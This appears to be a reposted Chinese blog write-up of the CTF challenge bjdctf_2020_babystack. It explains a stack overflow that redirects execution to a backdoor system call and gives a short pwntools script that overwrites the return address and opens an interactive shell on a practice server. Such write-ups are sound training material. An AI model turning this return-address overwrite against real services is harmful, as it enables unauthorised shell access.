当前位置：网站首页>bjdctf_2020_babystack

bjdctf_2020_babystack

2022-07-23 23:28:00 【长街395】

文章目录

一、查看文件
二、IDA反编译
三、代码
总结

一、查看文件

在这里插入图片描述
64位，保护基本未开

二、IDA反编译

我们放到ida 中再看看代码
在这里插入图片描述
初步判断栈溢出

接着看有个backdoor函数：
在这里插入图片描述有个system系统调用函数，
栈溢出实捶
我们找到command地址
buf 10字节就可以溢出

所以可以构造代码了。

三、代码

from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",25122)

p=b"a"*(0x10+0x08)+p64(0x4006e6)
r.sendline(str(len(p) + 1))
r.recvuntil('name?')
r.sendline(p)
r.interactive()

在这里插入图片描述

总结

虽然只是一道基础的栈溢出题目，我其实很激动，因为其他的博客里我多多少少是参照了其他大佬的思维，这道题，也算证明了菜狗子的训练是有效的，起码碰到类似的题目也可以尝试做了。嘻嘻，加油吧。

原网站

版权声明
本文为[长街395]所创，转载请带上原文链接，感谢
https://blog.csdn.net/weixin_56301399/article/details/125941703

当前位置：网站首页>bjdctf_2020_babystack

bjdctf_2020_babystack

文章目录

一、查看文件

二、IDA反编译

三、代码

总结

边栏推荐

猜你喜欢

随机推荐